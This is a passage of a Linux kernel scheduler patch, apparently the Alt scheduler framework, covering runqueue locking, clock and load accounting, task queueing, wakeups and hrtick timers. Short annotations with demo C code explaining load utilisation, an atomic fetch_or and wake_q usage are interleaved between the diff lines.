-+	struct rq *rq;
-+
-+	lockdep_assert_held(&p->pi_lock);
-+
-+	for (;;) {
-+		rq = task_rq(p);
-+		raw_spin_lock(&rq->lock);
-+		if (likely(rq == task_rq(p) && !task_on_rq_migrating(p)))
-+			return rq;
-+		raw_spin_unlock(&rq->lock);
-+
-+		while (unlikely(task_on_rq_migrating(p)))
-+			cpu_relax();
-+	}
-+}
-+
-+/*
-+ * task_rq_lock - lock p->pi_lock and lock the rq @p resides on.
-+ */
-+struct rq *task_rq_lock(struct task_struct *p, struct rq_flags *rf)
-+	__acquires(p->pi_lock)
-+	__acquires(rq->lock)
-+{
-+	struct rq *rq;
-+
-+	for (;;) {
-+		raw_spin_lock_irqsave(&p->pi_lock, rf->flags);
-+		rq = task_rq(p);
-+		raw_spin_lock(&rq->lock);
-+		/*
-+		 *	move_queued_task()		task_rq_lock()
-+		 *
-+		 *	ACQUIRE (rq->lock)
-+		 *	[S] ->on_rq = MIGRATING		[L] rq = task_rq()
-+		 *	WMB (__set_task_cpu())		ACQUIRE (rq->lock);
-+		 *	[S] ->cpu = new_cpu		[L] task_rq()
-+		 *					[L] ->on_rq
-+		 *	RELEASE (rq->lock)
-+		 *
-+		 * If we observe the old CPU in task_rq_lock(), the acquire of
-+		 * the old rq->lock will fully serialize against the stores.
-+		 *
-+		 * If we observe the new CPU in task_rq_lock(), the address
-+		 * dependency headed by '[L] rq = task_rq()' and the acquire
-+		 * will pair with the WMB to ensure we then also see migrating.
-+		 */
-+		if (likely(rq == task_rq(p) && !task_on_rq_migrating(p))) {
-+			return rq;
-+		}
-+		raw_spin_unlock(&rq->lock);
-+		raw_spin_unlock_irqrestore(&p->pi_lock, rf->flags);
-+
-+		while (unlikely(task_on_rq_migrating(p)))
-+			cpu_relax();
-+	}
-+}
-+
-+static inline void
-+rq_lock_irqsave(struct rq *rq, struct rq_flags *rf)
-+	__acquires(rq->lock)
-+{
-+	raw_spin_lock_irqsave(&rq->lock, rf->flags);
-+}
-+
-+static inline void
-+rq_unlock_irqrestore(struct rq *rq, struct rq_flags *rf)
-+	__releases(rq->lock)
-+{
-+	raw_spin_unlock_irqrestore(&rq->lock, rf->flags);
-+}
-+
-+void raw_spin_rq_lock_nested(struct rq *rq, int subclass)
-+{
-+	raw_spinlock_t *lock;
-+
-+	/* Matches synchronize_rcu() in __sched_core_enable() */
-+	preempt_disable();
-+
-+	for (;;) {
-+		lock = __rq_lockp(rq);
-+		raw_spin_lock_nested(lock, subclass);
-+		if (likely(lock == __rq_lockp(rq))) {
-+			/* preempt_count *MUST* be > 1 */
-+			preempt_enable_no_resched();
-+			return;
-+		}
-+		raw_spin_unlock(lock);
-+	}
-+}
-+
-+void raw_spin_rq_unlock(struct rq *rq)
-+{
-+	raw_spin_unlock(rq_lockp(rq));
-+}
-+
-+/*
-+ * RQ-clock updating methods:
-+ */
-+
-+static void update_rq_clock_task(struct rq *rq, s64 delta)
-+{
-+/*
-+ * In theory, the compiler should just see 0 here, and optimize out the call
-+ * to sched_rt_avg_update. But I don't trust it...
-+ */
-+	s64 __maybe_unused steal = 0, irq_delta = 0;
-+
-+#ifdef CONFIG_IRQ_TIME_ACCOUNTING
-+	irq_delta = irq_time_read(cpu_of(rq)) - rq->prev_irq_time;
-+
-+	/*
-+	 * Since irq_time is only updated on {soft,}irq_exit, we might run into
-+	 * this case when a previous update_rq_clock() happened inside a
-+	 * {soft,}irq region.
-+	 *
-+	 * When this happens, we stop ->clock_task and only update the
-+	 * prev_irq_time stamp to account for the part that fit, so that a next
-+	 * update will consume the rest. This ensures ->clock_task is
-+	 * monotonic.
-+	 *
-+	 * It does however cause some slight miss-attribution of {soft,}irq
-+	 * time, a more accurate solution would be to update the irq_time using
-+	 * the current rq->clock timestamp, except that would require using
-+	 * atomic ops.
-+	 */
-+	if (irq_delta > delta)
-+		irq_delta = delta;
-+
-+	rq->prev_irq_time += irq_delta;
-+	delta -= irq_delta;
-+	psi_account_irqtime(rq->curr, irq_delta);
-+#endif
-+#ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
-+	if (static_key_false((&paravirt_steal_rq_enabled))) {
-+		steal = paravirt_steal_clock(cpu_of(rq));
-+		steal -= rq->prev_steal_time_rq;
-+
-+		if (unlikely(steal > delta))
-+			steal = delta;
-+
-+		rq->prev_steal_time_rq += steal;
-+		delta -= steal;
-+	}
-+#endif
-+
-+	rq->clock_task += delta;
-+
-+#ifdef CONFIG_HAVE_SCHED_AVG_IRQ
-+	if ((irq_delta + steal))
-+		update_irq_load_avg(rq, irq_delta + steal);
-+#endif
-+}
-+
-+static inline void update_rq_clock(struct rq *rq)
-+{
-+	s64 delta = sched_clock_cpu(cpu_of(rq)) - rq->clock;
-+
-+	if (unlikely(delta <= 0))
-+		return;
-+	rq->clock += delta;
-+	update_rq_time_edge(rq);
-+	update_rq_clock_task(rq, delta);
-+}
-+
-+/*
-+ * RQ Load update routine
-+ */
-+#define RQ_LOAD_HISTORY_BITS		(sizeof(s32) * 8ULL)
-+#define RQ_UTIL_SHIFT			(8)
-+#define RQ_LOAD_HISTORY_TO_UTIL(l)	(((l) >> (RQ_LOAD_HISTORY_BITS - 1 - RQ_UTIL_SHIFT)) & 0xff)
-+
-+#define LOAD_BLOCK(t)		((t) >> 17)
-+#define LOAD_HALF_BLOCK(t)	((t) >> 16)
-+#define BLOCK_MASK(t)		((t) & ((0x01 << 18) - 1))
-+#define LOAD_BLOCK_BIT(b)	(1UL << (RQ_LOAD_HISTORY_BITS - 1 - (b)))
-+#define CURRENT_LOAD_BIT	LOAD_BLOCK_BIT(0)
-+
-+static inline void rq_load_update(struct rq *rq)
-+{
-+	u64 time = rq->clock;
-+	u64 delta = min(LOAD_BLOCK(time) - LOAD_BLOCK(rq->load_stamp),
-+			RQ_LOAD_HISTORY_BITS - 1);
-+	u64 prev = !!(rq->load_history & CURRENT_LOAD_BIT);
-+	u64 curr = !!rq->nr_running;
-+
-+	if (delta) {
-+		rq->load_history = rq->load_history >> delta;
-+
-+		if (delta < RQ_UTIL_SHIFT) {
-+			rq->load_block += (~BLOCK_MASK(rq->load_stamp)) * prev;
-+			if (!!LOAD_HALF_BLOCK(rq->load_block) ^ curr)
-+				rq->load_history ^= LOAD_BLOCK_BIT(delta);
-+		}
-+
-+		rq->load_block = BLOCK_MASK(time) * prev;
-+	} else {
-+		rq->load_block += (time - rq->load_stamp) * prev;
-+	}
-+	if (prev ^ curr)
-+		rq->load_history ^= CURRENT_LOAD_BIT;
-+	rq->load_stamp = time;
-+}
-+
-+unsigned long rq_load_util(struct rq *rq, unsigned long max)
-+{
-+	return RQ_LOAD_HISTORY_TO_UTIL(rq->load_history) * (max >> RQ_UTIL_SHIFT);
-+}
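
A hedged illustration of the conversion performed by rq_load_util(): the top
bits of the 32-bit busy/idle history become an 8-bit factor that scales the
capacity argument (constants copied from the macros above):

#include <stdint.h>
#include <stdio.h>

#define HISTORY_BITS	32
#define UTIL_SHIFT	8

static unsigned long demo_rq_load_util(uint32_t history, unsigned long max)
{
	unsigned long factor =
		(history >> (HISTORY_BITS - 1 - UTIL_SHIFT)) & 0xff;

	return factor * (max >> UTIL_SHIFT);
}

int main(void)
{
	/* All-busy history: close to full capacity (1020 of 1024). */
	printf("%lu\n", demo_rq_load_util(0xffffffffu, 1024));
	/* All-idle history: 0. */
	printf("%lu\n", demo_rq_load_util(0, 1024));
	return 0;
}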
-+
-+#ifdef CONFIG_SMP
-+unsigned long sched_cpu_util(int cpu)
-+{
-+	return rq_load_util(cpu_rq(cpu), arch_scale_cpu_capacity(cpu));
-+}
-+#endif /* CONFIG_SMP */
-+
-+#ifdef CONFIG_CPU_FREQ
-+/**
-+ * cpufreq_update_util - Take a note about CPU utilization changes.
-+ * @rq: Runqueue to carry out the update for.
-+ * @flags: Update reason flags.
-+ *
-+ * This function is called by the scheduler on the CPU whose utilization is
-+ * being updated.
-+ *
-+ * It can only be called from RCU-sched read-side critical sections.
-+ *
-+ * The way cpufreq is currently arranged requires it to evaluate the CPU
-+ * performance state (frequency/voltage) on a regular basis to prevent it from
-+ * being stuck in a completely inadequate performance level for too long.
-+ * That is not guaranteed to happen if the updates are only triggered from CFS
-+ * and DL, though, because they may not be coming in if only RT tasks are
-+ * active all the time (or there are RT tasks only).
-+ *
-+ * As a workaround for that issue, this function is called periodically by the
-+ * RT sched class to trigger extra cpufreq updates to prevent it from stalling,
-+ * but that really is a band-aid.  Going forward it should be replaced with
-+ * solutions targeted more specifically at RT tasks.
-+ */
-+static inline void cpufreq_update_util(struct rq *rq, unsigned int flags)
-+{
-+	struct update_util_data *data;
-+
-+#ifdef CONFIG_SMP
-+	rq_load_update(rq);
-+#endif
-+	data = rcu_dereference_sched(*per_cpu_ptr(&cpufreq_update_util_data,
-+						  cpu_of(rq)));
-+	if (data)
-+		data->func(data, rq_clock(rq), flags);
-+}
-+#else
-+static inline void cpufreq_update_util(struct rq *rq, unsigned int flags)
-+{
-+#ifdef CONFIG_SMP
-+	rq_load_update(rq);
-+#endif
-+}
-+#endif /* CONFIG_CPU_FREQ */
-+
-+#ifdef CONFIG_NO_HZ_FULL
-+/*
-+ * The tick may be needed by tasks in the runqueue depending on their policy
-+ * and requirements. If the tick is needed, let's send the target an IPI to
-+ * kick it out of nohz mode if necessary.
-+ */
-+static inline void sched_update_tick_dependency(struct rq *rq)
-+{
-+	int cpu = cpu_of(rq);
-+
-+	if (!tick_nohz_full_cpu(cpu))
-+		return;
-+
-+	if (rq->nr_running < 2)
-+		tick_nohz_dep_clear_cpu(cpu, TICK_DEP_BIT_SCHED);
-+	else
-+		tick_nohz_dep_set_cpu(cpu, TICK_DEP_BIT_SCHED);
-+}
-+#else /* !CONFIG_NO_HZ_FULL */
-+static inline void sched_update_tick_dependency(struct rq *rq) { }
-+#endif
-+
-+bool sched_task_on_rq(struct task_struct *p)
-+{
-+	return task_on_rq_queued(p);
-+}
-+
-+unsigned long get_wchan(struct task_struct *p)
-+{
-+	unsigned long ip = 0;
-+	unsigned int state;
-+
-+	if (!p || p == current)
-+		return 0;
-+
-+	/* Only get wchan if task is blocked and we can keep it that way. */
-+	raw_spin_lock_irq(&p->pi_lock);
-+	state = READ_ONCE(p->__state);
-+	smp_rmb(); /* see try_to_wake_up() */
-+	if (state != TASK_RUNNING && state != TASK_WAKING && !p->on_rq)
-+		ip = __get_wchan(p);
-+	raw_spin_unlock_irq(&p->pi_lock);
-+
-+	return ip;
-+}
-+
-+/*
-+ * Add/Remove/Requeue task to/from the runqueue routines
-+ * Context: rq->lock
-+ */
-+#define __SCHED_DEQUEUE_TASK(p, rq, flags)					\
-+	psi_dequeue(p, flags & DEQUEUE_SLEEP);					\
-+	sched_info_dequeue(rq, p);						\
-+										\
-+	list_del(&p->sq_node);							\
-+	if (list_empty(&rq->queue.heads[p->sq_idx])) 				\
-+		clear_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
-+
-+#define __SCHED_ENQUEUE_TASK(p, rq, flags)				\
-+	sched_info_enqueue(rq, p);					\
-+	psi_enqueue(p, flags);						\
-+									\
-+	p->sq_idx = task_sched_prio_idx(p, rq);				\
-+	list_add_tail(&p->sq_node, &rq->queue.heads[p->sq_idx]);	\
-+	set_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
-+
-+static inline void dequeue_task(struct task_struct *p, struct rq *rq, int flags)
-+{
-+	lockdep_assert_held(&rq->lock);
-+
-+	/*printk(KERN_INFO "sched: dequeue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
-+	WARN_ONCE(task_rq(p) != rq, "sched: dequeue task reside on cpu%d from cpu%d\n",
-+		  task_cpu(p), cpu_of(rq));
-+
-+	__SCHED_DEQUEUE_TASK(p, rq, flags);
-+	--rq->nr_running;
-+#ifdef CONFIG_SMP
-+	if (1 == rq->nr_running)
-+		cpumask_clear_cpu(cpu_of(rq), &sched_rq_pending_mask);
-+#endif
-+
-+	sched_update_tick_dependency(rq);
-+}
-+
-+static inline void enqueue_task(struct task_struct *p, struct rq *rq, int flags)
-+{
-+	lockdep_assert_held(&rq->lock);
-+
-+	/*printk(KERN_INFO "sched: enqueue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
-+	WARN_ONCE(task_rq(p) != rq, "sched: enqueue task reside on cpu%d to cpu%d\n",
-+		  task_cpu(p), cpu_of(rq));
-+
-+	__SCHED_ENQUEUE_TASK(p, rq, flags);
-+	update_sched_preempt_mask(rq);
-+	++rq->nr_running;
-+#ifdef CONFIG_SMP
-+	if (2 == rq->nr_running)
-+		cpumask_set_cpu(cpu_of(rq), &sched_rq_pending_mask);
-+#endif
-+
-+	sched_update_tick_dependency(rq);
-+}
-+
-+static inline void requeue_task(struct task_struct *p, struct rq *rq, int idx)
-+{
-+	lockdep_assert_held(&rq->lock);
-+	/*printk(KERN_INFO "sched: requeue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
-+	WARN_ONCE(task_rq(p) != rq, "sched: cpu[%d] requeue task reside on cpu%d\n",
-+		  cpu_of(rq), task_cpu(p));
-+
-+	list_del(&p->sq_node);
-+	list_add_tail(&p->sq_node, &rq->queue.heads[idx]);
-+	if (idx != p->sq_idx) {
-+		if (list_empty(&rq->queue.heads[p->sq_idx]))
-+			clear_bit(sched_idx2prio(p->sq_idx, rq),
-+				  rq->queue.bitmap);
-+		p->sq_idx = idx;
-+		set_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
-+		update_sched_preempt_mask(rq);
-+	}
-+}
-+
-+/*
-+ * cmpxchg based fetch_or, macro so it works for different integer types
-+ */
-+#define fetch_or(ptr, mask)						\
-+	({								\
-+		typeof(ptr) _ptr = (ptr);				\
-+		typeof(mask) _mask = (mask);				\
-+		typeof(*_ptr) _val = *_ptr;				\
-+									\
-+		do {							\
-+		} while (!try_cmpxchg(_ptr, &_val, _val | _mask));	\
-+	_val;								\
-+})
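
The same pattern rendered with C11 atomics for illustration:
atomic_fetch_or() is the direct equivalent, and the loop below mirrors the
try_cmpxchg() form, where the expected value is reloaded on failure:

#include <stdatomic.h>

static unsigned long demo_fetch_or(_Atomic unsigned long *p,
				   unsigned long mask)
{
	unsigned long val = atomic_load(p);

	/* On failure, "val" is updated to the current value, so the
	 * OR is recomputed on every retry, exactly as in the macro. */
	while (!atomic_compare_exchange_weak(p, &val, val | mask))
		;
	return val;
}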
-+
-+#if defined(CONFIG_SMP) && defined(TIF_POLLING_NRFLAG)
-+/*
-+ * Atomically set TIF_NEED_RESCHED and test for TIF_POLLING_NRFLAG,
-+ * this avoids any races wrt polling state changes and thereby avoids
-+ * spurious IPIs.
-+ */
-+static inline bool set_nr_and_not_polling(struct task_struct *p)
-+{
-+	struct thread_info *ti = task_thread_info(p);
-+	return !(fetch_or(&ti->flags, _TIF_NEED_RESCHED) & _TIF_POLLING_NRFLAG);
-+}
-+
-+/*
-+ * Atomically set TIF_NEED_RESCHED if TIF_POLLING_NRFLAG is set.
-+ *
-+ * If this returns true, then the idle task promises to call
-+ * sched_ttwu_pending() and reschedule soon.
-+ */
-+static bool set_nr_if_polling(struct task_struct *p)
-+{
-+	struct thread_info *ti = task_thread_info(p);
-+	typeof(ti->flags) val = READ_ONCE(ti->flags);
-+
-+	for (;;) {
-+		if (!(val & _TIF_POLLING_NRFLAG))
-+			return false;
-+		if (val & _TIF_NEED_RESCHED)
-+			return true;
-+		if (try_cmpxchg(&ti->flags, &val, val | _TIF_NEED_RESCHED))
-+			break;
-+	}
-+	return true;
-+}
-+
-+#else
-+static inline bool set_nr_and_not_polling(struct task_struct *p)
-+{
-+	set_tsk_need_resched(p);
-+	return true;
-+}
-+
-+#ifdef CONFIG_SMP
-+static inline bool set_nr_if_polling(struct task_struct *p)
-+{
-+	return false;
-+}
-+#endif
-+#endif
-+
-+static bool __wake_q_add(struct wake_q_head *head, struct task_struct *task)
-+{
-+	struct wake_q_node *node = &task->wake_q;
-+
-+	/*
-+	 * Atomically grab the task, if ->wake_q is !nil already it means
-+	 * it's already queued (either by us or someone else) and will get the
-+	 * wakeup due to that.
-+	 *
-+	 * In order to ensure that a pending wakeup will observe our pending
-+	 * state, even in the failed case, an explicit smp_mb() must be used.
-+	 */
-+	smp_mb__before_atomic();
-+	if (unlikely(cmpxchg_relaxed(&node->next, NULL, WAKE_Q_TAIL)))
-+		return false;
-+
-+	/*
-+	 * The head is context local, there can be no concurrency.
-+	 */
-+	*head->lastp = node;
-+	head->lastp = &node->next;
-+	return true;
-+}
-+
-+/**
-+ * wake_q_add() - queue a wakeup for 'later' waking.
-+ * @head: the wake_q_head to add @task to
-+ * @task: the task to queue for 'later' wakeup
-+ *
-+ * Queue a task for later wakeup, most likely by the wake_up_q() call in the
-+ * same context, _HOWEVER_ this is not guaranteed, the wakeup can come
-+ * instantly.
-+ *
-+ * This function must be used as-if it were wake_up_process(); IOW the task
-+ * must be ready to be woken at this location.
-+ */
-+void wake_q_add(struct wake_q_head *head, struct task_struct *task)
-+{
-+	if (__wake_q_add(head, task))
-+		get_task_struct(task);
-+}
-+
-+/**
-+ * wake_q_add_safe() - safely queue a wakeup for 'later' waking.
-+ * @head: the wake_q_head to add @task to
-+ * @task: the task to queue for 'later' wakeup
-+ *
-+ * Queue a task for later wakeup, most likely by the wake_up_q() call in the
-+ * same context, _HOWEVER_ this is not guaranteed, the wakeup can come
-+ * instantly.
-+ *
-+ * This function must be used as-if it were wake_up_process(); IOW the task
-+ * must be ready to be woken at this location.
-+ *
-+ * This function is essentially a task-safe equivalent to wake_q_add(). Callers
-+ * that already hold reference to @task can call the 'safe' version and trust
-+ * wake_q to do the right thing depending whether or not the @task is already
-+ * queued for wakeup.
-+ */
-+void wake_q_add_safe(struct wake_q_head *head, struct task_struct *task)
-+{
-+	if (!__wake_q_add(head, task))
-+		put_task_struct(task);
-+}
-+
-+void wake_up_q(struct wake_q_head *head)
-+{
-+	struct wake_q_node *node = head->first;
-+
-+	while (node != WAKE_Q_TAIL) {
-+		struct task_struct *task;
-+
-+		task = container_of(node, struct task_struct, wake_q);
-+		/* task can safely be re-inserted now: */
-+		node = node->next;
-+		task->wake_q.next = NULL;
-+
-+		/*
-+		 * wake_up_process() executes a full barrier, which pairs with
-+		 * the queueing in wake_q_add() so as not to miss wakeups.
-+		 */
-+		wake_up_process(task);
-+		put_task_struct(task);
-+	}
-+}
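
A hedged usage sketch for this API, following the pattern used elsewhere in
the kernel: collect wakeups while holding a lock, then issue them after
dropping it. Here some_lock and some_task are placeholders, not identifiers
from this patch:

static void demo_wake_one(spinlock_t *some_lock, struct task_struct *some_task)
{
	DEFINE_WAKE_Q(wake_q);

	spin_lock(some_lock);
	wake_q_add(&wake_q, some_task);	/* takes a task reference */
	spin_unlock(some_lock);

	wake_up_q(&wake_q);		/* wakes the task, drops the reference */
}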
-+
-+/*
-+ * resched_curr - mark rq's current task 'to be rescheduled now'.
-+ *
-+ * On UP this means the setting of the need_resched flag, on SMP it
-+ * might also involve a cross-CPU call to trigger the scheduler on
-+ * the target CPU.
-+ */
-+void resched_curr(struct rq *rq)
-+{
-+	struct task_struct *curr = rq->curr;
-+	int cpu;
-+
-+	lockdep_assert_held(&rq->lock);
-+
-+	if (test_tsk_need_resched(curr))
-+		return;
-+
-+	cpu = cpu_of(rq);
-+	if (cpu == smp_processor_id()) {
-+		set_tsk_need_resched(curr);
-+		set_preempt_need_resched();
-+		return;
-+	}
-+
-+	if (set_nr_and_not_polling(curr))
-+		smp_send_reschedule(cpu);
-+	else
-+		trace_sched_wake_idle_without_ipi(cpu);
-+}
-+
-+void resched_cpu(int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	if (cpu_online(cpu) || cpu == smp_processor_id())
-+		resched_curr(cpu_rq(cpu));
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+}
-+
-+#ifdef CONFIG_SMP
-+#ifdef CONFIG_NO_HZ_COMMON
-+void nohz_balance_enter_idle(int cpu) {}
-+
-+void select_nohz_load_balancer(int stop_tick) {}
-+
-+void set_cpu_sd_state_idle(void) {}
-+
-+/*
-+ * In the semi idle case, use the nearest busy CPU for migrating timers
-+ * from an idle CPU.  This is good for power-savings.
-+ *
-+ * We don't do a similar optimization for a completely idle system, as
-+ * selecting an idle CPU will add more delays to the timers than intended
-+ * (as that CPU's timer base may not be up to date wrt jiffies etc).
-+ */
-+int get_nohz_timer_target(void)
-+{
-+	int i, cpu = smp_processor_id(), default_cpu = -1;
-+	struct cpumask *mask;
-+	const struct cpumask *hk_mask;
-+
-+	if (housekeeping_cpu(cpu, HK_TYPE_TIMER)) {
-+		if (!idle_cpu(cpu))
-+			return cpu;
-+		default_cpu = cpu;
-+	}
-+
-+	hk_mask = housekeeping_cpumask(HK_TYPE_TIMER);
-+
-+	for (mask = per_cpu(sched_cpu_topo_masks, cpu) + 1;
-+	     mask < per_cpu(sched_cpu_topo_end_mask, cpu); mask++)
-+		for_each_cpu_and(i, mask, hk_mask)
-+			if (!idle_cpu(i))
-+				return i;
-+
-+	if (default_cpu == -1)
-+		default_cpu = housekeeping_any_cpu(HK_TYPE_TIMER);
-+	cpu = default_cpu;
-+
-+	return cpu;
-+}
-+
-+/*
-+ * When add_timer_on() enqueues a timer into the timer wheel of an
-+ * idle CPU then this timer might expire before the next timer event
-+ * which is scheduled to wake up that CPU. In case of a completely
-+ * idle system the next event might even be infinite time into the
-+ * future. wake_up_idle_cpu() ensures that the CPU is woken up and
-+ * leaves the inner idle loop so the newly added timer is taken into
-+ * account when the CPU goes back to idle and evaluates the timer
-+ * wheel for the next timer event.
-+ */
-+static inline void wake_up_idle_cpu(int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	if (cpu == smp_processor_id())
-+		return;
-+
-+	if (set_nr_and_not_polling(rq->idle))
-+		smp_send_reschedule(cpu);
-+	else
-+		trace_sched_wake_idle_without_ipi(cpu);
-+}
-+
-+static inline bool wake_up_full_nohz_cpu(int cpu)
-+{
-+	/*
-+	 * We just need the target to call irq_exit() and re-evaluate
-+	 * the next tick. The nohz full kick at least implies that.
-+	 * If needed we can still optimize that later with an
-+	 * empty IRQ.
-+	 */
-+	if (cpu_is_offline(cpu))
-+		return true;  /* Don't try to wake offline CPUs. */
-+	if (tick_nohz_full_cpu(cpu)) {
-+		if (cpu != smp_processor_id() ||
-+		    tick_nohz_tick_stopped())
-+			tick_nohz_full_kick_cpu(cpu);
-+		return true;
-+	}
-+
-+	return false;
-+}
-+
-+void wake_up_nohz_cpu(int cpu)
-+{
-+	if (!wake_up_full_nohz_cpu(cpu))
-+		wake_up_idle_cpu(cpu);
-+}
-+
-+static void nohz_csd_func(void *info)
-+{
-+	struct rq *rq = info;
-+	int cpu = cpu_of(rq);
-+	unsigned int flags;
-+
-+	/*
-+	 * Release the rq::nohz_csd.
-+	 */
-+	flags = atomic_fetch_andnot(NOHZ_KICK_MASK, nohz_flags(cpu));
-+	WARN_ON(!(flags & NOHZ_KICK_MASK));
-+
-+	rq->idle_balance = idle_cpu(cpu);
-+	if (rq->idle_balance && !need_resched()) {
-+		rq->nohz_idle_balance = flags;
-+		raise_softirq_irqoff(SCHED_SOFTIRQ);
-+	}
-+}
-+
-+#endif /* CONFIG_NO_HZ_COMMON */
-+#endif /* CONFIG_SMP */
-+
-+static inline void check_preempt_curr(struct rq *rq)
-+{
-+	if (sched_rq_first_task(rq) != rq->curr)
-+		resched_curr(rq);
-+}
-+
-+#ifdef CONFIG_SCHED_HRTICK
-+/*
-+ * Use HR-timers to deliver accurate preemption points.
-+ */
-+
-+static void hrtick_clear(struct rq *rq)
-+{
-+	if (hrtimer_active(&rq->hrtick_timer))
-+		hrtimer_cancel(&rq->hrtick_timer);
-+}
-+
-+/*
-+ * High-resolution timer tick.
-+ * Runs from hardirq context with interrupts disabled.
-+ */
-+static enum hrtimer_restart hrtick(struct hrtimer *timer)
-+{
-+	struct rq *rq = container_of(timer, struct rq, hrtick_timer);
-+
-+	WARN_ON_ONCE(cpu_of(rq) != smp_processor_id());
-+
-+	raw_spin_lock(&rq->lock);
-+	resched_curr(rq);
-+	raw_spin_unlock(&rq->lock);
-+
-+	return HRTIMER_NORESTART;
-+}
-+
-+/*
-+ * Use hrtick when:
-+ *  - enabled by features
-+ *  - hrtimer is actually high res
-+ */
-+static inline int hrtick_enabled(struct rq *rq)
-+{
-+	/**
-+	 * Alt schedule FW doesn't support sched_feat yet
-+	if (!sched_feat(HRTICK))
-+		return 0;
-+	*/
-+	if (!cpu_active(cpu_of(rq)))
-+		return 0;
-+	return hrtimer_is_hres_active(&rq->hrtick_timer);
-+}
-+
-+#ifdef CONFIG_SMP
-+
-+static void __hrtick_restart(struct rq *rq)
-+{
-+	struct hrtimer *timer = &rq->hrtick_timer;
-+	ktime_t time = rq->hrtick_time;
-+
-+	hrtimer_start(timer, time, HRTIMER_MODE_ABS_PINNED_HARD);
-+}
-+
-+/*
-+ * called from hardirq (IPI) context
-+ */
-+static void __hrtick_start(void *arg)
-+{
-+	struct rq *rq = arg;
-+
-+	raw_spin_lock(&rq->lock);
-+	__hrtick_restart(rq);
-+	raw_spin_unlock(&rq->lock);
-+}
-+
-+/*
-+ * Called to set the hrtick timer state.
-+ *
-+ * called with rq->lock held and irqs disabled
-+ */
-+void hrtick_start(struct rq *rq, u64 delay)
-+{
-+	struct hrtimer *timer = &rq->hrtick_timer;
-+	s64 delta;
-+
-+	/*
-+	 * Don't schedule slices shorter than 10000ns, that just
-+	 * doesn't make sense and can cause timer DoS.
-+	 */
-+	delta = max_t(s64, delay, 10000LL);
-+
-+	rq->hrtick_time = ktime_add_ns(timer->base->get_time(), delta);
-+
-+	if (rq == this_rq())
-+		__hrtick_restart(rq);
-+	else
-+		smp_call_function_single_async(cpu_of(rq), &rq->hrtick_csd);
-+}
-+
-+#else
-+/*
-+ * Called to set the hrtick timer state.
-+ *
-+ * called with rq->lock held and irqs disabled
-+ */
-+void hrtick_start(struct rq *rq, u64 delay)
-+{
-+	/*
-+	 * Don't schedule slices shorter than 10000ns, that just
-+	 * doesn't make sense. Rely on vruntime for fairness.
-+	 */
-+	delay = max_t(u64, delay, 10000LL);
-+	hrtimer_start(&rq->hrtick_timer, ns_to_ktime(delay),
-+		      HRTIMER_MODE_REL_PINNED_HARD);
-+}
-+#endif /* CONFIG_SMP */
-+
-+static void hrtick_rq_init(struct rq *rq)
-+{
-+#ifdef CONFIG_SMP
-+	INIT_CSD(&rq->hrtick_csd, __hrtick_start, rq);
-+#endif
-+
-+	hrtimer_init(&rq->hrtick_timer, CLOCK_MONOTONIC, HRTIMER_MODE_REL_HARD);
-+	rq->hrtick_timer.function = hrtick;
-+}
-+#else	/* CONFIG_SCHED_HRTICK */
-+static inline int hrtick_enabled(struct rq *rq)
-+{
-+	return 0;
-+}
-+
-+static inline void hrtick_clear(struct rq *rq)
-+{
-+}
-+
-+static inline void hrtick_rq_init(struct rq *rq)
-+{
-+}
-+#endif	/* CONFIG_SCHED_HRTICK */
-+
-+static inline int __normal_prio(int policy, int rt_prio, int static_prio)
-+{
-+	return rt_policy(policy) ? (MAX_RT_PRIO - 1 - rt_prio) :
-+		static_prio + MAX_PRIORITY_ADJ;
-+}
-+
-+/*
-+ * Calculate the expected normal priority: i.e. priority
-+ * without taking RT-inheritance into account. Might be
-+ * boosted by interactivity modifiers. Changes upon fork,
-+ * setprio syscalls, and whenever the interactivity
-+ * estimator recalculates.
-+ */
-+static inline int normal_prio(struct task_struct *p)
-+{
-+	return __normal_prio(p->policy, p->rt_priority, p->static_prio);
-+}
-+
-+/*
-+ * Calculate the current priority, i.e. the priority
-+ * taken into account by the scheduler. This value might
-+ * be boosted by RT tasks as it will be RT if the task got
-+ * RT-boosted. If not then it returns p->normal_prio.
-+ */
-+static int effective_prio(struct task_struct *p)
-+{
-+	p->normal_prio = normal_prio(p);
-+	/*
-+	 * If we are RT tasks or we were boosted to RT priority,
-+	 * keep the priority unchanged. Otherwise, update priority
-+	 * to the normal priority:
-+	 */
-+	if (!rt_prio(p->prio))
-+		return p->normal_prio;
-+	return p->prio;
-+}
-+
-+/*
-+ * activate_task - move a task to the runqueue.
-+ *
-+ * Context: rq->lock
-+ */
-+static void activate_task(struct task_struct *p, struct rq *rq)
-+{
-+	enqueue_task(p, rq, ENQUEUE_WAKEUP);
-+	p->on_rq = TASK_ON_RQ_QUEUED;
-+
-+	/*
-+	 * If in_iowait is set, the code below may not trigger any cpufreq
-+	 * utilization updates, so do it here explicitly with the IOWAIT flag
-+	 * passed.
-+	 */
-+	cpufreq_update_util(rq, SCHED_CPUFREQ_IOWAIT * p->in_iowait);
-+}
-+
-+/*
-+ * deactivate_task - remove a task from the runqueue.
-+ *
-+ * Context: rq->lock
-+ */
-+static inline void deactivate_task(struct task_struct *p, struct rq *rq)
-+{
-+	dequeue_task(p, rq, DEQUEUE_SLEEP);
-+	p->on_rq = 0;
-+	cpufreq_update_util(rq, 0);
-+}
-+
-+static inline void __set_task_cpu(struct task_struct *p, unsigned int cpu)
-+{
-+#ifdef CONFIG_SMP
-+	/*
-+	 * After ->cpu is set up to a new value, task_access_lock(p, ...) can be
-+	 * successfully executed on another CPU. We must ensure that updates of
-+	 * per-task data have been completed by this moment.
-+	 */
-+	smp_wmb();
-+
-+	WRITE_ONCE(task_thread_info(p)->cpu, cpu);
-+#endif
-+}
-+
-+static inline bool is_migration_disabled(struct task_struct *p)
-+{
-+#ifdef CONFIG_SMP
-+	return p->migration_disabled;
-+#else
-+	return false;
-+#endif
-+}
-+
-+#define SCA_CHECK		0x01
-+#define SCA_USER		0x08
-+
-+#ifdef CONFIG_SMP
-+
